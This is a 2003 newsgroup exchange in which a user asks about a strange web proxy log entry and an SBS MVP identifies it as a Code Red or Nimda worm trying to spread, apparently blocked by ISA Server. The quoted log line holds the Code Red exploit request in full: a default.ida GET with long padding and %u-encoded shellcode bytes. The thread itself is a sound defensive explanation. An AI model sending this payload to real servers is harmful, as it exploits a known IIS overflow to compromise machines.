Can someone explain this please. why does it appear in my web proxy logs
amonst the normal users listings?
217.12.2.218 anonymous - 2003-09-26 04:59:50 myserver - 217.22.65.99 - - 63
3818 - - GET
http://217.37.59.65/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801
%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u00
78%u0000%u00=a - 12202
> Can someone explain this please. why does it appear in my web proxy
> logs amonst the normal users listings?
[quoted text clipped - 11 lines]
> %u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53
> ff%u00 78%u0000%u00=a - 12202
That's an attempt by a Code Red or Nimda infected machine trying to
spread to yours. Looks like it's being blocked by ISA.

Signature
Steve Foster [SBS MVP]
---------------------------------------
MVPs do not work for Microsoft. Please reply only to the newsgroups.